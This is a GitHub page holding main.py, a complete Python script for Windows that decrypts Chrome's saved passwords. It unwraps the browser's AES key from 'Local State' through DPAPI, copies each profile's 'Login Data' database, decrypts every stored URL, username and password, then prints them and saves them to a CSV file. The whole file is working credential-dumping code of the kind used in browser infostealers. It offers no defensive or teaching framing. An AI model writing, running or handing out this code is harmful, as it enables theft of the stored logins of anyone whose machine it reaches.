-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
91 lines (80 loc) · 3.87 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import os
import re
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
import csv
# global const
CHROME_PATH = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data" % (os.environ['USERPROFILE']))
CHROME_PATH_LOCAL_STATE = os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State" % (os.environ['USERPROFILE']))
def get_db_connection(chrome_path_login_db):
print(chrome_path_login_db)
shutil.copy2(chrome_path_login_db, "Loginvault.db")
return sqlite3.connect("Loginvault.db")
# 获取明文存储在 CHROME_PATH_LOCAL_STATE 的 AES_KEY
def get_k():
with open(CHROME_PATH_LOCAL_STATE, "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
k = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
# Remove suffix DPAPI (Data Protection API)
k = k[5:]
# Use API CryptUnprotectData win32
k = win32crypt.CryptUnprotectData(k, None, None, None, 0)[1]
return k
# 生成AES解密密钥
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
# 处理AES对称加密后的密文,密文结构:iv (4 bits) + 被加密的密码密文 + suffix bytes (16 bits)
# 切片取出 iv 和 enc_passwd
# 生成AES解密密钥(iv + key)
# 解密
def decrypt_password(ciphertext, key):
iv = ciphertext[3:15]
# Removing suffix bytes (last 16 bits) and the encrypted password is 192 bits
enc_passwd = ciphertext[15:-16]
# Build the cipher to decrypt the ciphertext
AES_dec_cipher = generate_cipher(key, iv)
dec_passwd = AES_dec_cipher.decrypt(enc_passwd).decode()
return dec_passwd
if __name__ == '__main__':
try:
# Create .csv file to store passwords
with open('decrypted_password.csv', mode='w', newline='', encoding='utf-8') as decrypt_password_file:
csv_writer = csv.writer(decrypt_password_file, delimiter=',')
csv_writer.writerow(["index", "url", "username", "password"])
# (1) Get secret key
secret_key = get_k()
# Search directory where the encrypted login password is stored
folders = [element for element in os.listdir(CHROME_PATH) if re.search("^Profile*|^Default$", element) != None]
# folders = ['Default']
for folder in folders:
# (2) Get ciphertext from sqlite database
chrome_path_login_db = os.path.normpath(r"%s\%s\Login Data" % (CHROME_PATH, folder))
conn = get_db_connection(chrome_path_login_db)
if secret_key and conn:
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for index, login in enumerate(cursor.fetchall()):
url = login[0]
username = login[1]
ciphertext = login[2]
if (url != "" and username != "" and ciphertext != ""):
# (3) Filter the initialisation vector & encrypted password from ciphertext
# (4) Use AES algorithm to decrypt the password
decrypted_password = decrypt_password(ciphertext, secret_key)
print("Index: %d" % index)
print("URL: %s\nUser Name: %s\nPassword: %s\n" % (url, username, decrypted_password))
print("*" * 50)
# (5) Save into CSV
csv_writer.writerow([index, url, username, decrypted_password])
# Close database connection
cursor.close()
conn.close()
# Delete temp login db
os.remove("Loginvault.db")
except Exception as e:
print("[ERR] %s" % (str(e)))